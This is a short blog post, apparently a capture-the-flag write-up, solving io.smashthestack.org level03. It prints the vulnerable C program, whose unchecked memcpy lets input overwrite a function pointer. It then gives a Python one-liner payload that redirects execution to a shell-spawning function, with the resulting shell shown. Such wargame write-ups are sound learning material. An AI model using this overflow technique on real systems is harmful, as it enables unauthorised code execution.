티스토리 뷰

Pwnable/io.smashthestack.org

[io.smashthestack.org] level03

err0rless313 2015. 1. 4. 23:33 
//bla, based on work by beach
#include <stdio.h>
#include <string.h>

void good()
{
        puts("Win.");
        execl("/bin/sh", "sh", NULL);
}
void bad()
{
        printf("I'm so sorry, you're at %p and you want to be at %p\n", bad, good);
}

int main(int argc, char **argv, char **envp)
{
        void (*functionpointer)(void) = bad;
        char buffer[50];

        if(argc != 2 || strlen(argv[1]) < 4)
                return 0;

        memcpy(buffer, argv[1], strlen(argv[1]));
        memset(buffer, 0, strlen(argv[1]) - 4);

        printf("This is exciting we're going to %p\n", functionpointer);
        functionpointer();

        return 0;
}



level3@io:/levels$ ./level03 $(python -c 'print "AAAA" + "\x74\x84\x04\x08" * 19')

This is exciting we're going to 0x8048474

Win.

sh-4.2$ whoami

level4

저작자표시 비영리 변경금지

'Pwnable > io.smashthestack.org' 카테고리의 다른 글

[io.smashthestack.org] level06  (0) 2015.01.04
[io.smashthestack.org] level05  (0) 2015.01.04
[io.smashthestack.org] level04  (0) 2015.01.04
[io.smashthestack.org] level02  (0) 2015.01.04
[io.smashthestack.org] level01  (0) 2015.01.04
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
TAG
more
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
글 보관함